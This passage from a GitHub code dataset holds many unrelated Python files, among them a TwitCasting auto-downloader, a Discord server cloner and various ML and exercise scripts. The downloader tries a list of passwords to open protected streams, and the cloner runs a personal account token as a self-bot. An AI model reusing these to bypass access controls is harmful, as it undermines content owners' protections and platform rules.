res['movie']:\n live_date = datetime.fromtimestamp(res['movie']['created']).strftime('%Y%m%d')\n else:\n live_date = res['movie']['date']\n if \"_\" not in screen_id[0] or \"_\" not in screen_id[-1]:\n live_url = f\"https://twitcasting.tv/{screen_id}/movie/{live_id}\"\n else:\n live_url = f\"`https://twitcasting.tv/{screen_id}/movie/{live_id}`\"\n download_url = f\"https://twitcasting.tv/{screen_id}/movie/{live_id}\"\n except KeyError as kError:\n logger.error(kError, exc_info=True)\n # If a live stream has been encountered for the first time\n if not user_data['notified']:\n # Send notification to discord webhook\n if WEBHOOK_URL is not None:\n if protected and member_only:\n live_text = f\"{screen_id} has a protected member's only live stream at \"\n elif protected:\n live_text = f\"{screen_id} has a protected live stream at \"\n elif member_only:\n live_text = f\"{screen_id} has a member's only live stream at \"\n else:\n live_text = f\"{screen_id} is now live at \"\n # print(\" \" * 70, end='\\n')\n logger.info(live_text + download_url)\n live_text, live_url = format_url_message(screen_id, live_id, live_text, live_url)\n message = {\"embeds\": [{\n \"color\": 13714,\n \"author\": {\n \"name\": screen_id,\n \"icon_url\": user_image\n },\n \"fields\": [\n {\n \"name\": f\"{live_title}\\n{live_comment}\\n\\n{live_text}\",\n \"value\": live_url\n }\n ],\n \"image\": {\n \"url\": live_thumbnail\n },\n \"thumbnail\": {\n \"url\": user_image\n }\n }]\n }\n requests.post(WEBHOOK_URL, json=message)\n user_data['notified'] = True\n\n if not user_data['downloaded']:\n # Get password list\n passwords = None\n if protected:\n passwords = get_passwords()\n passwords.add(datetime.utcnow().strftime(\"%Y%m%d\"))\n\n # Download the live stream\n # logger.info(f\"Downloading {download_url}\\n\")\n logger.info(f\"Downloading {download_url}\")\n file_name = check_file(live_date, live_title, live_id, screen_id, output_path)\n output = f'{output_path}/{screen_id}/{file_name}'\n logger.debug(f\"Download Path: {output}\")\n if not protected and not member_only:\n yt_dlp_args = ['start', f'auto-twitcasting {screen_id} {live_id}', '/min', 'cmd', '/c',\n 'yt-dlp', *COOKIES, '--no-part', '--embed-metadata', '-N', '4']\n yt_dlp_args += ['-o', output, download_url]\n # TODO: get output from result so I can log it\n result = subprocess.run(yt_dlp_args, shell=True)\n elif protected and passwords is not None:\n # Try downloading protected streams by trying all the passwords\n # If stream happens to also be a password protected member's only stream this should work too\n # This will open up a console for each password so make sure the password list isn't too long...\n for password in passwords:\n # Scenario where cookies unlock the video but video-password is still called so error or not\n yt_dlp_args = ['start', f'auto-twitcasting {screen_id} {live_id}', '/min', 'cmd', '/c',\n 'yt-dlp', *COOKIES, '--no-part', '--embed-metadata']\n yt_dlp_args += ['--video-password', password, '-o', output, download_url]\n result = subprocess.run(yt_dlp_args, shell=True)\n # TODO pass check and if output by making another call checking -F and does not contain \"ERROR:\" then break out\n # time.sleep(1)\n elif member_only:\n yt_dlp_args = ['start', f'auto-twitcasting {screen_id} {live_id}', '/min', 'cmd', '/c',\n 'yt-dlp', *COOKIES, '--no-part']\n yt_dlp_args += ['--embed-metadata', '-o', output, download_url]\n result = subprocess.run(yt_dlp_args, shell=True)\n else:\n logger.error(f\"Failed to download protected stream at {download_url}\")\n user_data['downloaded'] = True\n except Exception as e:\n logger.error(e, exc_info=True)\n","repo_name":"Spicadox/auto-twitcasting","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":22844,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"34"} +{"seq_id":"28170452782","text":"#!/usr/bin/env python3\n\n# Create a matrix listing where every driver was built.\n#\n# The resulting json object looks something like this:\n# {\n# \"3.10.0-123.1.2.el7.x86_64\": {\n# \"2.2.0\": {\n# \"ebpf\": \"unavailable\",\n# \"kmod\": \"upstream\"\n# },\n# \"2.3.0\": {\n# \"ebpf\": \"unavailable\",\n# \"kmod\": \"upstream\"\n# },\n# \"2.4.0\": {\n# \"ebpf\": \"unavailable\",\n# \"kmod\": \"upstream\"\n# },\n# \"2.5.0\": {\n# \"ebpf\": \"unavailable\"\n# }\n# },\n# \"4.18.0-80.el8.x86_64\": {\n# \"2.2.0\": {\n# \"kmod\": \"upstream\",\n# \"ebpf\": \"upstream\"\n# },\n# \"2.3.0\": {\n# \"kmod\": \"upstream\",\n# \"ebpf\": \"upstream\"\n# },\n# \"2.4.0\": {\n# \"kmod\": \"upstream\",\n# \"ebpf\": \"upstream\"\n# },\n# \"2.5.0\": {\n# \"ebpf\": \"upstream\"\n# }\n# },\n# ...\n# }\n#\n# If you are interested on finding a specific kernel, you can use jq with a\n# filter similar to the following:\n# jq '.\"6.2.8-300.fc38.x86_64\"' driver-matrix.json\n# {\n# \"2.4.0\": {\n# \"kmod\": \"upstream\",\n# \"ebpf\": \"upstream\"\n# },\n# \"2.5.0\": {\n# \"ebpf\": \"upstream\"\n# }\n# }\n\nimport argparse\nimport json\nimport os\nimport sys\nimport re\n\nkernel_version_re = re.compile(r'(\\d+\\.\\d+\\.\\d+.*)\\.(o|ko)\\.gz$')\nunavailable_re = re.compile(r'\\.collector-ebpf-(\\d+\\.\\d+\\.\\d+.*)\\.unavail$')\n\n\ndef update_kernel(kernel_list: dict,\n kernel_version: str,\n driver_version: str,\n driver_type: str,\n source: str):\n kernel = kernel_list.get(kernel_version)\n if kernel is None:\n kernel_list[kernel_version] = {\n driver_version: {\n driver_type: source,\n }\n }\n else:\n dver = kernel.get(driver_version)\n if dver is None:\n kernel[driver_version] = {\n driver_type: source,\n }\n else:\n dver[driver_type] = source\n\n\ndef process_line(kernels: dict,\n source: str,\n line: str):\n driver_path, driver = os.path.split(line)\n _, driver_version = os.path.split(driver_path)\n\n match = kernel_version_re.search(driver)\n if match:\n kernel_version = match[1]\n driver_type = 'kmod' if match[2] == 'ko' else 'ebpf'\n update_kernel(kernels, kernel_version,\n driver_version, driver_type, source)\n return\n\n match = unavailable_re.search(driver)\n if match:\n kernel_version = match[1]\n update_kernel(kernels, kernel_version,\n driver_version, 'ebpf', 'unavailable')\n return\n\n print('Did not match any known drivers')\n\n\ndef main(file: str, source: str):\n kernels = {}\n\n if file is None:\n file = sys.stdout\n else:\n if os.path.isfile(file):\n with open(file, 'r') as f:\n kernels = json.load(f)\n\n file = open(file, \"w\")\n\n for line in sys.stdin:\n process_line(kernels, source, line.rstrip())\n\n json.dump(kernels, file)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-u', '--update', help='File to be updated')\n parser.add_argument('-d', '--downstream', action='store_true',\n help='Mark available drivers as \"downstream\"')\n args = parser.parse_args()\n\n source = 'downstream' if args.downstream else 'upstream'\n file = args.update\n\n main(file, source)\n","repo_name":"stackrox/collector","sub_path":".github/actions/support-package-driver-matrix/driver-matrix.py","file_name":"driver-matrix.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"34"} +{"seq_id":"1366106531","text":"from os import system\r\nimport psutil\r\nfrom pypresence import Presence\r\nimport time\r\nimport sys\r\nstart_time=time.time()\r\nimport discord\r\nimport asyncio\r\nimport colorama\r\nfrom colorama import Fore, init, Style\r\nimport platform\r\nfrom serverclone import Clone\r\n\r\nclient = discord.Client()\r\nos = platform.system()\r\nif os == \"Windows\":\r\n system(\"cls\")\r\nelse:\r\n system(\"clear\")\r\n print(chr(27) + \"[2J\")\r\nprint(f\"\"\"{Fore.RED}\r\n\r\n\r\n█ █▀ ▄█ ▄ ▄▀ ▄▄▄▄▄ ▄▄▄▄▄ ▄███▄ █▄▄▄▄ ▄ ▄███▄ █▄▄▄▄ ▄█▄ █ ████▄ ▄ ▄███▄ █▄▄▄▄ \r\n█▄█ ██ █ ▄▀ █ ▀▄ █ ▀▄ █▀ ▀ █ ▄▀ █ █▀ ▀ █ ▄▀ █▀ ▀▄ █ █ █ █ █▀ ▀ █ ▄▀ \r\n█▀▄ ██ ██ █ █ ▀▄ ▄ ▀▀▀▀▄ ▄ ▀▀▀▀▄ ██▄▄ █▀▀▌ █ █ ██▄▄ █▀▀▌ █ ▀ █ █ █ ██ █ ██▄▄ █▀▀▌ \r\n█ █ ▐█ █ █ █ █ █ ▀▄▄▄▄▀ ▀▄▄▄▄▀ █▄ ▄▀ █ █ █ █ █▄ ▄▀ █ █ █▄ ▄▀ ███▄ ▀████ █ █ █ █▄ ▄▀ █ █ \r\n █ ▐ █ █ █ ███ ▀███▀ █ █ █ ▀███▀ █ ▀███▀ ▀ █ █ █ ▀███▀ █ \r\n ▀ █ ██ ▀ █▐ ▀ █ ██ ▀ \r\n ▐ \r\n{Style.RESET_ALL}\r\n {Fore.MAGENTA}Developed by: TEAM IC.{Style.RESET_ALL}\r\n \"\"\")\r\ntoken = input(f'Please enter your token:\\n >')\r\nguild_s = input('Please enter guild id you want to copy:\\n >')\r\nguild = input('Please enter guild id where you want to copy:\\n >')\r\ninput_guild_id = guild_s # <-- input guild id\r\noutput_guild_id = guild # <-- output guild id\r\ntoken = token # <-- your Account token\r\n\r\n\r\nprint(\" \")\r\nprint(\" \")\r\n\r\n@client.event\r\nasync def on_ready():\r\n extrem_map = {}\r\n print(f\"Logged In as : {client.user}\")\r\n print(\"Cloning Server\")\r\n guild_from = client.get_guild(int(input_guild_id))\r\n guild_to = client.get_guild(int(output_guild_id))\r\n await Clone.guild_edit(guild_to, guild_from)\r\n await Clone.roles_delete(guild_to)\r\n await Clone.channels_delete(guild_to)\r\n await Clone.roles_create(guild_to, guild_from)\r\n await Clone.categories_create(guild_to, guild_from)\r\n await Clone.channels_create(guild_to, guild_from)\r\n print(f\"\"\"{Fore.GREEN}\r\n\r\n\r\n██▄ ████▄ ▄ ▄███▄ \r\n█ █ █ █ █ █▀ ▀ \r\n█ █ █ █ ██ █ ██▄▄ \r\n█ █ ▀████ █ █ █ █▄ ▄▀ \r\n███▀ █ █ █ ▀███▀ \r\n █ ██ \r\n\r\n {Style.RESET_ALL}\"\"\")\r\n await asyncio.sleep(5)\r\n client.close()\r\n\r\n\r\nclient.run(token, bot=False)\r\n","repo_name":"NFTCOWS/Discord-Server-Cloner-With-Perms-and-Hidden-Channels","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"16283245984","text":"import numpy as np\nimport tensorflow as tf\nBATCH_SIZE=8\nseed=23455\n\n#基于seed产生随机数\nrng=np.random.RandomState(seed)\n#随机生成32行2列的矩阵\nX=rng.rand(32,2)\n#行的和小于1,赋值1; 大于等于1,赋值0\nY=[[int(x0+x1<1)] for (x0,x1) in X]\nprint(X)\nprint(Y)\n\n#定义数据集的输入\nx=tf.placeholder(tf.float32,shape=(None,2))\ny_=tf.placeholder(tf.float32,shape=(None,1))\n\n#定义参数\nw1=tf.Variable(tf.random_normal([2,3],stddev=1,seed=1))\nw2=tf.Variable(tf.random_normal([3,1],stddev=1,seed=1))\n\n\n#定义前向传播过程\na=tf.matmul(x,w1)\ny=tf.matmul(a,w2)\n\n#定义损失函数\nloss=tf.reduce_mean(tf.square(y-y_))\n#定义反向传播算法\ntrain_step=tf.train.GradientDescentOptimizer(0.001).minimize(loss)\n\n#生成会话\nsess=tf.Session()\ninit_op=tf.global_variables_initializer()\nsess.run(init_op)\n\n##输出训练前,w1,w2的取值\nprint(sess.run(w1))\nprint(sess.run(w2))\n\n##训练模型\n\nSTEPS=3000\nfor i in range(STEPS):\n start=(i*BATCH_SIZE)%32\n end=start+BATCH_SIZE\n sess.run(train_step,feed_dict={x:X[start:end], y_:Y[start:end]})\n if i%500==0:\n total_loss=sess.run(loss,feed_dict={x:X, y_:Y})\n print(\"After %d traing steps,loss on all data is %g\"%(i,total_loss))\n\n##输出训练后,w1,w2的取值\nprint(sess.run(w1))\nprint(sess.run(w2))\n\n","repo_name":"QIANXUDECC/mnist_tensorflow","sub_path":"backforward.py","file_name":"backforward.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10736248052","text":"#this defines the trading MDP\nfrom data_preprocessing import Data\nfrom agent import Agent\nimport numpy as np\nfrom copy import deepcopy\nfrom common import hot_encoding, save_data_structure, DIRECTORY\n\n# state here means a sequence of Data's states of length T\n# steps are done T days ahead\nclass TradingEnv:\n def __init__(self, data: Data, initial_value=100000):\n self.initial_value = initial_value\n self.portfolio = [float(initial_value)]\n self.actions = []\n self.prev_close = None\n self.data = data\n self.spread = 0.08\n self.trade_size = 100000\n\n def merge_state_action(self, state, a_variable):\n T = len(state)\n actions_for_state = self.actions[self.data.n:][:T-1] # TODO: Check indices\n actions_for_state.append(a_variable)\n # TODO: Is there a better way\n diff = T - len(actions_for_state)\n if diff > 0:\n actions_for_state.extend([a_variable] * diff)\n\n result = []\n for s, a in zip(state, actions_for_state):\n new_s = deepcopy(s)\n new_s.extend(hot_encoding(a))\n result.append(new_s)\n\n result = np.asarray(result)\n return result\n\n # Returns: state\n def reset(self) -> object:\n self.portfolio = [float(self.initial_value)]\n self.data.reset()\n self.actions.append(0) # TODO: Check if this correct\n closing, state_initial = self.data.next()\n self.prev_close = closing\n return self.merge_state_action(state_initial, 0)\n\n # Returns: actions, rewards, new_states, selected new_state, done\n def step(self, action) -> object: # TODO: check if everything is correct esp. with the action values and array indexing\n actions = [-1, 0, 1]\n v_old = self.portfolio[-1]\n\n try:\n closing, state_next = self.data.next()\n done = False\n except:\n state_next = None\n done = True\n\n new_states = []\n for a in actions:\n new_states.append(self.merge_state_action(state_next, a))\n\n current_closed = closing\n if self.prev_close is not None:\n current_open = self.prev_close\n self.prev_close = current_closed\n else:\n raise Exception(\"No previous close price saved!\")\n\n v_new = []\n for a in actions:\n commission = self.trade_size * np.abs(a - self.actions[-1]) * self.spread\n v_new.append(v_old + a * self.trade_size * (current_closed - current_open) - commission)\n\n v_new = np.asarray(v_new)\n rewards = np.log(v_new/v_old)\n\n self.actions.append(int(action))\n self.portfolio.append(float(v_new[action+1]))\n\n return actions, rewards, new_states, new_states[action+1], done\n\n def print_stats(self):\n # draw portfolio and actions against price curve\n s = np.random.randint(0, 1000)\n save_data_structure(self.actions, DIRECTORY + \"actions%s.json\" % s )\n save_data_structure(self.portfolio, DIRECTORY + \"portfolio%s.json\" % s)\n\n\nclass RunAgent:\n def __init__(self, env: TradingEnv, agent: Agent):\n self.env = env\n self.agent = agent\n\n def run(self, episodes):\n self.agent.initialize()\n\n state = self.env.reset() # initial_state\n\n for step in range(episodes):\n action = self.agent.get_action(state) # select greedy action, exploration is done in step-method\n\n actions, rewards, new_states, state, done = self.env.step(action)\n\n if done:\n break\n\n self.agent.store(state, actions, rewards, new_states)\n\n if self.agent.is_memory_filled() and step % self.agent.network.T == 0: # TODO: Check if this is the right T\n self.agent.train(update=True)\n\n self.env.print_stats()","repo_name":"StephanH84/algo-trading","sub_path":"forex/src/trading_env.py","file_name":"trading_env.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"49576773381","text":"'''Возьмите любые 1-3 задачи из прошлых домашних заданий. Добавьте к ним логирование ошибок и полезной информации. \nТакже реализуйте возможность запуска из командной строки с передачей параметров.'''\n\n'''Взяла задание №1 из семинара 13\nСоздайте функцию, которая запрашивает числовые данные от\nпользователя до тех пор, пока он не введёт целое или\nвещественное число.\nОбрабатывайте не числовые данные как исключения.'''\n\n\nimport logging\nimport sys\n\ndef num_exc():\n while True:\n if len(sys.argv) > 1:\n num = sys.argv[1]\n else:\n num = input('Введите целое или вещественное число: ')\n try:\n num = int(num)\n break\n except ValueError as e:\n try:\n num = float(num)\n break\n except ValueError as e:\n logging.error(f'Ошибка при вводе числа: {e}')\n print(f'Вы ввели неправильное значение: {e}\\nПопробуйте снова!')\n return num\n\nif __name__ == '__main__':\n logging.basicConfig(filename='log.log', level=logging.ERROR, encoding='UTF-8')\n \n print(type(num_exc()))","repo_name":"Lena-Da/Python","sub_path":"seminar15/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72780811616","text":"\"\"\"\nurl: https://leetcode.com/problems/cheapest-flights-within-k-stops/\n* K 경유지 내 가장 저렴한 항공권\n시작점에서 도착점까지의 가장 저렴한 가격을 계산하되, K개의 경유지 이내에 도착하는 가격을 리턴하라.\n경로가 존재하지 않을 경우 -1을 리턴한다.\n- Example 1:\nInput:\n n = 3, edges = [[0,1,100],[1,2,100],[0,2,500]]\n src = 0, dst = 2, k = 0\nOutput: 500\n\"\"\"\nimport collections\nimport heapq\nfrom typing import List\n\n\nclass Solution:\n def findCheapestPrice(self, n: int, flights: List[List[int]], src: int, dst: int, K: int) -> int:\n graph = collections.defaultdict(list)\n # 그래프 인접 리스트 구성\n for f, t, w in flights:\n graph[f].append((t, w))\n\n # 가격, 정점, 소요시간\n Q = [(0, src, K)]\n\n # 우선 순위 큐 최솟값 기준으로 도착점까지 최소 비용 판별\n while Q:\n _price, _node, _k = heapq.heappop(Q)\n if _node == dst:\n return _price\n if _k >= 0:\n for v, w in graph[_node]:\n alt = w + _price\n heapq.heappush(Q, (alt, v, _k - 1))\n\n return -1\n\n\n\nif __name__ == '__main__':\n n = 3\n edges = [[0, 1, 100], [1, 2, 100], [0, 2, 500]]\n src = 0\n dst = 2\n k = 0\n print(Solution().findCheapestPrice(n, edges, src, dst, k), \"||\", 200)\n\"\"\"\n[시작 체크 리스트]\n[] 1시간 지났으나 발상 불가 또는 ��예 다른 길\n[✓] 코드 50% 정도 완성\n[] 1시간 보다 더 걸려서 코드 완성\n[] 코드는 다 돌아가는데 효율성에서 걸림\n[] 코드 완성\n\n[완료 후 체크 리스트]\n[] 아예 모르겠음\n[] 중간 정도 이해함\n[✓] 완벽히 이해함\n\"\"\"","repo_name":"bum12ark/algorithm","sub_path":"python/python-algorithm-intervew/12-graphs/review/41-cheapest-flights-within-k-stops-review.py","file_name":"41-cheapest-flights-within-k-stops-review.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"21151578267","text":"import configparser\nimport logging\nimport os\nimport typing\n\n\nclass ConfigHandler:\n def __init__(self, *, user_mode: bool = False) -> None:\n self.user_mode = user_mode\n\n path = os.path.realpath(__file__)\n parent_dir = os.path.dirname(path)\n project_dir = os.path.dirname(parent_dir)\n\n self.bank_conf_path = os.path.join(project_dir, \"bank2ynab.conf\")\n self.user_conf_path = os.path.join(\n project_dir, \"user_configuration.conf\"\n )\n\n self.config = self.get_configs()\n\n def get_configs(self) -> configparser.RawConfigParser:\n \"\"\"Retrieve all configuration parameters.\"\"\"\n\n conf_files: list[str] = []\n\n if not self.user_mode:\n conf_files.append(self.bank_conf_path)\n conf_files.append(self.user_conf_path)\n try:\n if not os.path.exists(conf_files[0]):\n raise FileNotFoundError\n except FileNotFoundError:\n s = f\"Configuration file not found: {conf_files[0]}\"\n logging.error(s)\n raise FileNotFoundError(s)\n else:\n config = configparser.RawConfigParser()\n config.read(conf_files, encoding=\"utf-8\")\n return config\n\n def fix_conf_params(self, section: str) -> dict[str, typing.Any]:\n \"\"\"from a ConfigParser object, return a dictionary of all parameters\n for a given section in the expected format.\n Because ConfigParser defaults to values under [DEFAULT] if present,\n these values should always appear unless the file is really bad.\n\n :param section: name of section in config file to access\n (i.e. bank name, e.g. \"MyBank\" matches \"[MyBank]\" in file)\n :type section: str\n :return: dictionary matching shorthand strings to specified\n values in config\n :rtype: dict\n \"\"\"\n\n bank_config = {\n \"bank_name\": section,\n \"input_columns\": self.get_config_line_lst(\n section, \"Input Columns\", \",\"\n ),\n \"output_columns\": self.get_config_line_lst(\n section, \"Output Columns\", \",\"\n ),\n \"api_columns\": self.get_config_line_lst(\n section, \"API Transaction Fields\", \",\"\n ),\n \"input_filename\": self.get_config_line_str(\n section, \"Source Filename Pattern\"\n ),\n \"path\": self.get_config_line_str(section, \"Source Path\"),\n \"ext\": self.get_config_line_str(\n section, \"Source Filename Extension\"\n ),\n \"encoding\": self.get_config_line_str(section, \"Encoding\"),\n \"regex\": self.get_config_line_boo(\n section, \"Use Regex For Filename\"\n ),\n \"fixed_prefix\": self.get_config_line_str(\n section, \"Output Filename Prefix\"\n ),\n \"output_ext\": self.get_config_line_str(\n section, \"Output Filename Extension\"\n ),\n \"input_delimiter\": self.get_config_line_str(\n section, \"Source CSV Delimiter\"\n ),\n \"header_rows\": self.get_config_line_int(section, \"Header Rows\"),\n \"footer_rows\": self.get_config_line_int(section, \"Footer Rows\"),\n \"date_format\": self.get_config_line_str(section, \"Date Format\"),\n \"date_dedupe\": self.get_config_line_boo(\n section, \"Date De-Duplication\"\n ),\n \"delete_original\": self.get_config_line_boo(\n section, \"Delete Source File\"\n ),\n \"cd_flags\": self.get_config_line_lst(\n section, \"Inflow or Outflow Indicator\", \",\"\n ),\n \"payee_to_memo\": self.get_config_line_boo(\n section, \"Use Payee for Memo\"\n ),\n \"plugin\": self.get_config_line_str(section, \"Plugin\"),\n \"plugin_args\": self.get_config_line_lst(\n section, \"Plugin Arguments\", \"\\n\"\n ),\n \"api_token\": self.get_config_line_str(\n section, \"YNAB API Access Token\"\n ),\n \"api_account\": self.get_config_line_lst(\n section, \"YNAB Account ID\", \"|\"\n ),\n \"currency_mult\": self.get_config_line_flt(\n section, \"Currency Conversion Factor\"\n ),\n }\n\n # quick n' dirty fix for tabs as delimiters\n if bank_config[\"input_delimiter\"] == \"\\\\t\":\n bank_config[\"input_delimiter\"] = \"\\t\"\n\n return bank_config\n\n def get_config_line_str(self, section_name: str, param: str) -> str:\n \"\"\"\n Returns a string value from a given section in the config object.\n\n :param section_name: section to search for parameter\n :type section_name: str\n :param param: parameter to obtain from section\n :type param: str\n :return: value matching parameter\n :rtype: str\n \"\"\"\n return self.config.get(section_name, param)\n\n def get_config_line_int(self, section_name: str, param: str) -> int:\n \"\"\"\n Returns an integer value from a given section in the config object.\n\n :param section_name: section to search for parameter\n :type section_name: str\n :param param: parameter to obtain from section\n :type param: str\n :return: value matching parameter\n :rtype: int\n \"\"\"\n return self.config.getint(section_name, param)\n\n def get_config_line_flt(self, section_name: str, param: str) -> float:\n \"\"\"\n Returns a float value from a given section in the config object.\n\n :param section_name: section to search for parameter\n :type section_name: str\n :param param: parameter to obtain from section\n :type param: str\n :return: value matching parameter\n :rtype: float\n \"\"\"\n return self.config.getfloat(section_name, param)\n\n def get_config_line_boo(self, section_name: str, param: str) -> bool:\n \"\"\"\n Returns a bool value from a given section in the config object.\n\n :param section_name: section to search for parameter\n :type section_name: str\n :param param: parameter to obtain from section\n :type param: str\n :return: value matching parameter\n :rtype: bool\n \"\"\"\n return self.config.getboolean(section_name, param)\n\n def get_config_line_lst(\n self, section_name: str, param: str, splitter: str\n ) -> list[typing.Any]:\n \"\"\"\n Returns a list value from a given section in the config object.\n\n :param section_name: section to search for parameter\n :type section_name: str\n :param param: parameter to obtain from section\n :type param: str\n :return: value matching parameter\n :rtype: list\n \"\"\"\n return self.config.get(section_name, param).split(splitter)\n","repo_name":"bank2ynab/bank2ynab","sub_path":"bank2ynab/config_handler.py","file_name":"config_handler.py","file_ext":"py","file_size_in_byte":6943,"program_lang":"python","lang":"en","doc_type":"code","stars":221,"dataset":"github-code","pt":"34"} +{"seq_id":"38775046098","text":"import os\nimport csv\n\ncandidate_list=[]\nvotes_count=[]\nTotal_Votes=0\ncsvpath=os.path.join('Resources','PyPoll_election_data.csv')\n\nwith open(csvpath,'r') as csvfile:\n csvreader=csv.reader(csvfile,delimiter=',')\n header=next(csvreader)\n for rows in csvreader:\n if rows[2] not in candidate_list:\n candidate_list.append(rows[2])\n votes_count.append(0)\n\nwith open(csvpath,'r') as csvfile:\n csvreader=csv.reader(csvfile,delimiter=',')\n header=next(csvreader)\n for rows in csvreader:\n votes_count[candidate_list.index(rows[2])]+=1\n Total_Votes+=1\n\ndef space():\n print(\"-------------------------\")\n\noutput_path=os.path.join('Analysis','PyPoll.txt')\nwith open (output_path, \"w\") as datafile:\n print(\"Election Results\")\n datafile.write(\"Election Results\\n\")\n space()\n datafile.write(\"-------------------------\\n\")\n print(f\"Total Votes: {Total_Votes}\")\n datafile.write(f\"Total Votes: {Total_Votes}\\n\")\n space()\n datafile.write(\"-------------------------\\n\")\n\n winner=candidate_list[0]\n for i in range(len(votes_count)):\n Vote_Percentage=votes_count[i]/Total_Votes\n if votes_count[i]>votes_count[candidate_list.index(winner)]:\n winner=candidate_list[i]\n print(f\"{candidate_list[i]}: {'%.3f%%' % (Vote_Percentage * 100)} ({votes_count[i]})\") #The format of voting_percentage should be in \"%\" and keep 3 decimal points.\n datafile.write(f\"{candidate_list[i]}: {'%.3f%%' % (Vote_Percentage * 100)} ({votes_count[i]})\\n\")\n\n space()\n datafile.write(\"-------------------------\\n\")\n print(f\"Winner: {winner}\")\n datafile.write(f\"Winner: {winner}\\n\")\n space()\n datafile.write(\"-------------------------\\n\")","repo_name":"FengWang1991/python-challenge","sub_path":"PyPoll/PyPollmain.py","file_name":"PyPollmain.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42474667662","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nurlpatterns = patterns('',\n url(r'^$', include('game.urls', namespace=\"game\")),\n url(r'^game/', include('game.urls', namespace=\"game\")),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^accounts/login/$', 'django.contrib.auth.views.login', {'template_name': 'login.html'}),\n url(r'^accounts/logout/$', 'django.contrib.auth.views.logout', {'template_name': 'logout.html'}),\n)\n","repo_name":"mrchaarlie/Curio-X","sub_path":"curiox/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"32281135974","text":"import cv2\n\ncamera = cv2.VideoCapture(0)\n\nwhile True:\n success, frame = camera.read()\n\n if not success:\n break\n else:\n print(frame.shape)\n cv2.imshow('Video Output', frame)\n\n # Breaking the loop if 'q' is pressed\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Releasing camera\ncamera.release()\n# Destroying all opened OpenCV windows\ncv2.destroyAllWindows()","repo_name":"hieu-tyler/capstone-object-detection","sub_path":"socket/frontend/test_camera.py","file_name":"test_camera.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"826696935","text":"import pygame as pg\nfrom config import *\n\n\nclass Tile(pg.sprite.Sprite):\n def __init__(self, x, y):\n super().__init__()\n self.image = pg.Surface((TILE_SET, TILE_SET))\n self.image.fill('red')\n self.rect = self.image.get_rect(topleft=(x, y))\n self.x_scroll = 0\n self.y_scroll = 0\n\n def update(self):\n self.rect.x += self.x_scroll\n self.rect.y += self.y_scroll\n","repo_name":"bruleocruz/RE--Metal-Warriors","sub_path":"tiles.py","file_name":"tiles.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41821764314","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nMel Spectrogram of a dataset\r\n\r\n@author: Chinmay Sinha\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport librosa as lbr\r\n\r\ndef load_signal(filename, enforce_shape=None):\r\n new_input, sample_rate = lbr.load(filename, mono=True)\r\n features = lbr.feature.melspectrogram(new_input, **MEL_KWARGS).T\r\n\r\n if enforce_shape is not None:\r\n if features.shape[0] < enforce_shape[0]:\r\n delta_shape = (enforce_shape[0] - features.shape[0],\r\n enforce_shape[1])\r\n features = np.append(features, np.zeros(delta_shape), axis=0)\r\n elif features.shape[0] > enforce_shape[0]:\r\n features = features[: enforce_shape[0], :]\r\n\r\n features[features == 0] = 1e-6\r\n return (np.log(features), float(new_input.shape[0]) / sample_rate)\r\n","repo_name":"ch1nmayx/Audio_Processing_MarkOne","sub_path":"MFCC.py","file_name":"MFCC.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"37353531735","text":"'''Python Pizza Deliveries'''\n\nprint(\"Thank you for choosing Python Pizza Deliveries!\")\n\nsize = input(\"Which size of pizza would you like to have? S, M or L? \")\nadd_pepperoni = input(\"Do you want pepperoni on it? Y or N? \")\nextra_cheese = input(\"Would you like to have an extra cheese on your pizza? Y or N? \")\n\nbill = 0\n\nif size == \"S\":\n bill += 15\nelif size == \"M\":\n bill += 20\nelif size == \"L\":\n bill += 25\nelse:\n print(\"Invalid entry! :(\")\n\nif add_pepperoni == \"Y\":\n if size == \"S\":\n bill += 2\n else:\n bill += 3\n\nif extra_cheese == \"Y\":\n bill += 1\nelse:\n pass\n\nprint(f\"Your final bill is: ${bill}.\")\n","repo_name":"mohneeshdaksh/Python-Bootcamp-Projects","sub_path":"If Else Conditions/Python Pizza Deliveries/python_pizza_deliveries.py","file_name":"python_pizza_deliveries.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6628946230","text":"# # \n## 모험가 길드\n\n## Solution\n\n### 문제의 아이디어 생각해낸 포인트\n# 그리디, 오름차순 정렬\n# 공포도가 작은 수끼리 묶여야 적게도 그룹이 생성 가능하므로 많은 그룹 생성 가능 \n\n### 시간 복잡도 계산\n# O(NlogN)\n\n### 입력\nimport sys\nimport 